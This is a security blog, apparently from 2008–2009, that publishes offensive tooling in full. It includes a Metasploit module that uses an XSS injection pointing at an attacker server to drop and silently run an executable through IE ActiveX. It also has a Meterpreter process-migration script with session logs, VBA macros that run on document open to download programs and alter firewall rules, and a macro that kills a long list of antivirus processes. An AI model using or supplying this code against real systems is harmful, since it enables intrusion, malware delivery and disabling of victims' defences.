Invisible Denizen

Tuesday, January 27, 2009

ie_unsafe_scripting metasploit module

Update: This module now works as a standalone HTTP or javascript include. Also, we pushed this to SVN on 2/27/09.

This one's not in the svn tree yet; I'll update this post if it gets pulled in. I've had a couple of requests for it, so thought I would go ahead and drop it here.

It's meant to be used on intranet XSS in environments that have the "Initialize and script ActiveX controls not marked as safe for scripting" set to "enabled". I've run into a few such environments set this way for compatibility with intranet web apps. Rather than turning it on for only those specific sites (or, ummm, fixing the sites), they grant it for the entire intranet.

Intranet XSS is all over the place. Even the rock-dumb scanners like nikto will pick up dozens on a normal internal penetration test.

Next steps: create a fast XSS scanner written in javascript to automatically exploit this stuff over the internet!

For use like so:

http://vulnerable-server/vulnerable_web_app.asp?var="><script src=http://attacker-msf-server.com/ie_unsafe_scripting.js></script>

Or, if you are actually sitting on the intranet and can get people to hit http://server/msf.htm

<html><head></head><body>
<script src=http://msf-server/ie_unsafe_scripting.js>
</script></body></html>

Explanation of how it works

This works because this security setting grants access to the WScript ActiveX control from scripting languages in Internet Explorer (Javascript and VBScript). With this control you can (among other things):

Execute commands similar to a shell prompt (except you get to run these silently, without notifying the user) through WScript.Shell
Create/delete/modify text file through WScript.FileSystemObject

Unfortunately, it does not allow you to directly write binary files to the file system. (You can use WScript.FileSystemObject to create a 'text' file that contains binary data, but this will only work if you are in an ANSI / ASCII-based version of Windows, such as us in the USA. If you're in Japan, it apparently epicfails. No promises mine won't do the same thing, even though I've tried to work around it.)

As a result, when you want to write a file to disk you use the ADODB.Stream ActiveX control. Unfortunately for bad guys and pentesters, IE7 put in a new security control called "Access data sources across domain", which now by default is set to prompt the user if they want to allow your script to talk to other 'domains'. (Windows / IE treats the filesystem as a different 'domain', and therefore you can't read/write to it if your code was loaded from http://intranet/.)

But I can write text files and I can execute commands? Well, then I can write a script file directly to disk and then execute it, getting around the extra IE7 permissions!

This module pushes javascript that instantiates the WScript.FileSystemObject, writes a vbscript file to the %TEMP% directory, executes the script with WScript.Shell, and deletes it. The vbscript:

has a metasploit executable payload stored inside a really big hex block, which is converted to an ANSI character array once the script runs
converts the character array into a binary array using some ADODB.Stream trickery (ADODB.Stream won't accept an ANSI character array as input to write a binary file; it'll give you a type error.)
feeds ADODB.Stream the now converted binaryArray that it likes, and is written to disk

There are some things that could be done to minimize the size of the transport, but this is working now so I don't see a lot of reason to slim it down any further. This module defaults to using gzip transfer encoding, which will probably make it about as small of a transfer as can easily be made.

I randomized a bunch of junk, but I would assume those giant blocks of hex are probably very signatureable for the antivirus guys. If I really care, one day maybe I'll get around to doing some trickery so it encodes/decodes differently every time. For now, here it is:

##
#
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})
    super(update_info(info,
        'Name'           => 'Internet Explorer Unsafe Scripting Misconfiguration',
        'Description'    => %q{
            This exploit takes advantage of the "Initialize and script ActiveX controls not
        marked safe for scripting" setting within Internet Explorer.  When this option is set,
        IE allows access to the WScript.Shell ActiveX control, which allows javascript to
        interact with the file system and run commands.  This security flaw is not uncommon
        in corporate environments for the 'Intranet' or 'Trusted Site' zones.  In order to
        save binary data to the file system, ADODB.Stream access is required, which in IE7
        will trigger a cross domain access violation.  As such, we write the code to a .vbs
        file and execute it from there, where no such restrictions exist.
   
            When set via domain policy, the most common registry entry to modify is HKLM\
        Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201,
        which if set to '0' forces ActiveX controls not marked safe for scripting to be
        enabled for the Intranet zone.
   
            This module creates javascript code meant to be included in a <SCRIPT> tag, such as
        http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js>
        </script>.
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
            [
                'natron'
            ],
        'Version'        => '$Revision:$',
        'References'     =>
            [
                [ 'MS', 'http://support.microsoft.com/kb/182569' ],
            ],
        'Payload'        =>
            {
                'Space'           => 4000,
                'StackAdjustment' => -3500,
            },
        'Platform'       => 'win',
        'Targets'        =>
            [
                  [ 'Automatic', { } ],

            ],
        'DefaultOptions' =>
            {
                'HTTP::compression' => 'gzip'
            },
        'DefaultTarget'  => 0))
end

def on_request_uri(cli, request)

    #print_status("Starting...");
    # Build out the HTML response page
    var_shellobj     = rand_text_alpha(rand(5)+5);
    var_fsobj        = rand_text_alpha(rand(5)+5);
    var_fsobj_file   = rand_text_alpha(rand(5)+5);
    var_vbsname      = rand_text_alpha(rand(5)+5);
    var_writedir     = rand_text_alpha(rand(5)+5);
    var_exename      = rand_text_alpha(rand(5)+5);
    var_origLoc      = rand_text_alpha(rand(5)+5);
    var_byteArray    = rand_text_alpha(rand(5)+5);
    var_stream       = rand_text_alpha(rand(5)+5);
    var_writestream  = rand_text_alpha(rand(5)+5);
    var_strmConv     = rand_text_alpha(rand(5)+5);

    p = regenerate_payload(cli);
    #print_status("Genning payload...");
    exe = Rex::Text.to_win32pe(p.encoded, '');
    #print_status("Building vbs file...");
    # Build the content that will end up in the .vbs file
    vbs_content    = Rex::Text.to_hex(%Q|Dim #{var_origLoc}, s, #{var_byteArray}
#{var_origLoc} = SetLocale(1033)
|)

    print_status("Encoding payload into vbs/javascript...");
    # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
    # for conversion with ADODB.Stream
    vbs_content << Rex::Text.to_hex("\ts = s & Chr(CInt(\"&H#{("%.2x" % exe[0]).upcase}\"))\r\n")

    1.upto(exe.length) do |i|
        vbs_content << Rex::Text.to_hex("\ts = s & Chr(CInt(\"&H#{("%.2x" % exe[i]).upcase}\"))\r\n")
    end

    # Continue with the rest of the vbs file;
    # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent
    # Then use ADODB.Stream again to write the binary to file.
    #print_status("Finishing vbs...");
    vbs_content << Rex::Text.to_hex(%Q|
Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
#{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{var_exename}.exe"

Set #{var_strmConv} = CreateObject("ADODB.Stream")

#{var_strmConv}.Type = 2
#{var_strmConv}.Charset = "x-ansi"
#{var_strmConv}.Open
#{var_strmConv}.WriteText s, 0
#{var_strmConv}.Position = 0
#{var_strmConv}.Type = 1
#{var_byteArray} = #{var_strmConv}.Read

Set #{var_writestream} = CreateObject("ADODB.Stream")

#{var_writestream}.Type = 1
#{var_writestream}.Open
#{var_writestream}.Write #{var_byteArray}
#{var_writestream}.SaveToFile #{var_writedir}, 2

SetLocale(#{var_origLoc})|)

    # Encode the vbs_content
    #print_status("Hex encoded vbs_content: #{vbs_content}");

    # Build the javascript that will be served
    js_content  = %Q|var #{var_shellobj} = new ActiveXObject("WScript.Shell");
var #{var_fsobj}    = new ActiveXObject("Scripting.FileSystemObject");
var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);

#{var_fsobj_file}.Write(unescape("#{vbs_content}"));
#{var_fsobj_file}.Close();

#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
#{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{var_exename}.exe", 0, false);
#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
|

    print_status("Sending exploit javascript to #{cli.peerhost}:#{cli.peerport}...");
    print_status("Exe will be #{var_exename}.exe and must be manually removed from the %TEMP% directory on the target.");

    # Transmit the response to the client
    send_response(cli, js_content, { 'Content-Type' => 'text/javascript' })

    # Handle the payload
    handler(cli)   
end
end

Wednesday, December 17, 2008

Default IE7 Settings for XP SP3 and Server 2003 SP1

In doing some research on IE7 permissions I searched high and low on the MSDN and similar places, and couldn't find a complete list of default settings. So, I created the following spreadsheet to document what was available, by default, for the various security zones ('Intranet', 'Internet', etc). This was a quick analysis and only includes those with 'simple' registry values (like 0, 1, etc), and doesn't parse out any of the more complex values. See this MS link for more info.

When I created it, I looked at a fresh XP SP3 install and an almost new Server 2003 SP1 install. I followed the rules for precedence when conflicting rules are in place (e.g. HKLM vs HKCU, Domain policy over default HKLM/HKCU, etc) and came up with the final results. At some point, I'll go back and do it properly with complete documentation of the sources of the various settings, but in the mean time if anyone else would find this useful, here ya go.

Specifically, the settings that may be interested to look at are:

1206 Miscellaneous: Allow scripting of Internet Explorer Web browser control ^
1208 ActiveX controls and plug-ins: Allow previously unused ActiveX controls to run without prompt ^
1209 ActiveX controls and plug-ins: Allow Scriptlets
1407 Scripting: Allow Programmatic clipboard access
1607 Miscellaneous: Navigate sub-frames across different domains
1805 Launching programs and files in webview #
1806 Miscellaneous: Launching applications and unsafe files
1809 Miscellaneous: Use Pop-up Blocker ** ^
1A04 Miscellaneous: Don't prompt for client certificate selection when no certificates or only one certificate exists * ^
1A05 Allow 3rd party persistent cookies *
1A10 Privacy Settings *
2102 Miscellaneous: Allow script initiated windows without size or position constraints ** ^
2103 Scripting: Allow status bar updates via script ^
2104 Miscellaneous: Allow websites to open windows without address or status bars ^
2105 Scripting: Allow websites to prompt for information using scripted windows ^
2200 Downloads: Automatic prompting for file downloads ** ^
2201 ActiveX controls and plug-ins: Automatic prompting for ActiveX controls ** ^
2301 Miscellaneous: Use Phishing Filter ^
1207 Reserved #
1408 Reserved #
1807 Reserved ** #
180A Reserved #
180D Reserved #

Lastly, if any of you who review this notice your settings at are different from these, please drop me an email.

The default IE7 settings are located at the below registry entries. If policy-enforced settings are in placed, they override whatever is set here.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

Default Windows IE7 Permissions

Friday, December 12, 2008

Automatic migration to a new process with meterpreter

Playing with metasploit's new ie_xml_corruption module, I needed a way to automatically migrate outside of the current process (iexplore.exe). This particular exploit locks up the process upon exploitation, leaving the user sitting at a hung Internet Explorer. Should a user ctrl+alt+delete and terminate it, I didn't want to lose the session.

An example migrate script exists that will do some of this, but if you use it in it's default form, it migrates to lsass.exe. If meterpreter then crashes (or you close it), it'll kill the whole process... which you certainly don't want to do with lsass. Also, my little script has the added benefit of working even if the exploited user doesn't have admin privileges (and LSASS migration would then be impossible).

msf exploit(ie_xml_corruption) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 192.168.182.1
[*] Started reverse handler
[*] Using URL: http://192.168.182.1:80/ie-xml-corruption.html
[*] Server started.
[*] Sending HTML to 192.168.182.1:2761...
[*] Sending DLL to 192.168.182.1:2761...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (75776 bytes)
[*] Meterpreter session 5 opened (192.168.182.1:4444 -> 192.168.182.1:2762)
msf exploit(ie_xml_corruption) > sessions -i 5
[*] Starting interaction with 5...

run launch_and_migrate
[*] Launching hidden cmd.exe...
[*] Process 5560 created.
[*] Current process is IEXPLORE.EXE (656).  Migrating to 5560.
[*] Migration completed successfully.
[*] New server process: cmd.exe (5560)
[*] Old process 656 killed.

Save the file to .msf3/scripts/meterpreter/ (may need to create the subdirectories) and it'll become available to your meterpreter sessions. You should be able to set the script to automatically run with the advanced AutoRunScript option:

Payload advanced options (windows/reflectivemeterpreter/reverse_tcp):

   Name           : AutoLoadStdapi
   Current Setting: true
   Description    : Automatically load the Stdapi extension

   Name           : AutoRunScript
   Current Setting: 
   Description    : Script to autorun on meterpreter session creation

... but I couldn't get it to work in the few minutes I had to play with it. It may be broken on Windows, or I just may not be able to figure out how to do paths in Windows + Ruby. I'll check with my linux install over the weekend.

And here's the code:

launch_and_migrate.rb

##
## Meterpreter script that launches a hidden process, 
## migrates to it, then kills the old process.
##
## Provided by natron (natron 0x40 invisibledenizen 0x2E com)
##

# Get the target process name
target = args[0] || "cmd.exe"

def launchProc(target)
    print_status("Launching hidden #{target}...")

    # Set the vars; these can of course be modified if need be
    cmd_exec    = target
    cmd_args    = nil
    hidden      = true
    channelized = nil
    use_thread_token = false

    # Launch new process
    newproc = client.sys.process.execute(cmd_exec, cmd_args, 
            'Channelized' => channelized,
            'Hidden'      => hidden,
            'InMemory'    => nil,
            'UseThreadToken' => use_thread_token)

    print_status("Process #{newproc.pid} created.")
    
    return newproc
end

def migrateToProc(newproc)
    # Grab the current pid info
    server = client.sys.process.open
    print_status("Current process is #{server.name} (#{server.pid}).  Migrating to #{newproc.pid}.")
    
    # Save the old process info so we can kill it after migration.
    oldproc = server.pid
    
    # Do the migration
    client.core.migrate(newproc.pid.to_i)

    print_status("Migration completed successfully.")

    # Grab new process info
    server = client.sys.process.open

    print_status("New server process: #{server.name} (#{server.pid})")
    
    return oldproc
end

def killApp(procpid)
    client.sys.process.kill(procpid)
    print_status("Old process #{procpid} killed.")
end

# Main flow of execution
newProcPid = launchProc(target)
oldProc = migrateToProc(newProcPid)
killApp(oldProc)

Sunday, November 16, 2008

< PRE > tags suck.

Apparently the < PRE > tag kills blogger's ability to do wordwrapping. Awesome. Someone with better blogging skills than I: what's the solution?

Modifying Windows Firewall Rules from VBA

You can also modify the Microsoft Windows firewall from within VBA using the HNetCfg.FwMgr object. Versions of these scripts are available on MSDN.

Function Add_App_To_Firewall(program_name, program_executable, program_scope)
 
   Const NET_FW_PROFILE_DOMAIN = 0
   Const NET_FW_PROFILE_STANDARD = 1

   Const NET_FW_SCOPE_ALL_NAME = "All subnets"
   Const NET_FW_SCOPE_LOCAL_SUBNET_NAME = "Local subnet only"
 
   Const NET_FW_IP_VERSION_ANY = 2
 
   ' Create the firewall manager object.
   Dim fwMgr
   Set fwMgr = CreateObject("HNetCfg.FwMgr")

   ' Get the current profile for the local firewall policy.
   Dim profile
   Set profile = fwMgr.LocalPolicy.CurrentProfile
 
   Dim app
   Set app = CreateObject("HNetCfg.FwAuthorizedApplication")

   app.ProcessImageFileName = program_executable
   app.Name = program_name
   app.Scope = program_scope
 
   app.IpVersion = NET_FW_IP_VERSION_ANY
   app.Enabled = True

   On Error Resume Next
   profile.AuthorizedApplications.Add app

End Function

Function Remove_App_From_Firewall(program_executable)

   On Error Resume Next

   ' Create the firewall manager object.
   Dim fwMgr
   Set fwMgr = CreateObject("HNetCfg.FwMgr")
 
   ' Get the current profile for the firewall
   Dim fwPolicy
   Set fwPolicy = fwMgr.LocalPolicy.CurrentProfile
 
   ' Get the Auth Applications object so we can modify
   Dim colApplications
   Set colApplications = fwPolicy.AuthorizedApplications
 
   colApplications.Remove program_executable

End Function

As an example, here's the commands that will download the Tiny Web Server from the internet, unzip it, add it to the allowed exceptions list for the Windows FW, create a quick .html file, start the server, run Internet Explorer pointed to this server, then kill the server, remove the firewall rule, and delete all of the files.

Sub Workbook_Open()
   'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip
   'Obviously in a real world application you'd want to bring your own unzipper
   Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") &amp; "\tinyweb.zip"
   Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT
 
   Const NET_FW_SCOPE_ALL = 0, NET_FW_SCOPE_LOCAL_SUBNET = 1, NET_FW_SCOPE_CUSTOM = 2
   Add_App_To_Firewall "tiny-local", Environ("TEMP") &amp; "\tiny.exe", NET_FW_SCOPE_LOCAL_SUBNET
 
   Run_Cmd "echo iexplore-pwned > %TEMP%\index.html", INVISIBLE, WAIT
 
   Run_Program "%TEMP%\tiny.exe", "%TEMP% 12345", INVISIBLE, NOWAIT
 
   ' "Sleep" for a couple of seconds to allow tiny.exe to load
   Run_Cmd "ping -n 2 127.0.0.1", INVISIBLE, WAIT
 
   Run_Program "iexplore", "http://127.0.0.1:12345", VISIBLE, WAIT
 
   Run_Cmd "taskkill /F /IM tiny.exe", INVISIBLE, WAIT
 
   Remove_App_From_Firewall Environ("TEMP") &amp; "\tiny.exe"
 
   On Error Resume Next
   Kill Environ("TEMP") &amp; "\tinyweb.zip"
   Kill Environ("TEMP") &amp; "\SRC.zip"
   Kill Environ("TEMP") &amp; "\LICENSE.txt"
   Kill Environ("TEMP") &amp; "\File_id.diz"
   Kill Environ("TEMP") &amp; "\Readme.txt"
   Kill Environ("TEMP") &amp; "\Cgitest.zip"
   Kill Environ("TEMP") &amp; "\index.html"
   Kill Environ("TEMP") &amp; "\tiny.exe"

End Sub

How to Kill Antivirus from Word or Excel VBA

Building off of the previous posts and functions, here's how to kill off antivirus from within a VBA Macro in Excel or Word (I stole this list from the meterpreter script):

Function Build_Cmd_List(arrayCmds, command)
       
    If arrayCmds(0) <> "" Then
        ReDim Preserve arrayCmds(UBound(arrayCmds) + 1) As String
    End If
   
    arrayCmds(UBound(arrayCmds)) = command
   
End Function

Function Kill_AV()

    Dim arrayCmds() As String
    ReDim arrayCmds(0) As String
    On Error Resume Next

    Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avp32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpcc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ackwin32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""adaware.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""advxdwin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentsvr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""alertsvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""alevir.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""alogserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""amon9x.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""anti-trojan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""antivirus.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ants.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""apimonitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""aplica32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""apvxdwin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""arr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""atcon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""atguard.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""atro55en.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""atupdater.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""atwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""au.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""aupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""auto-protect.nav80try.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""autodown.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""autotrace.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""autoupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avconsol.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ave32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgcc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgctrl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-agnt95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icload95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pccwin98.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""serv95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-98.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv9.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkpop.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkservice.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkwctl9.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avltmain.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsynmgr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwinnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupsrv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitor9x.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitornt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
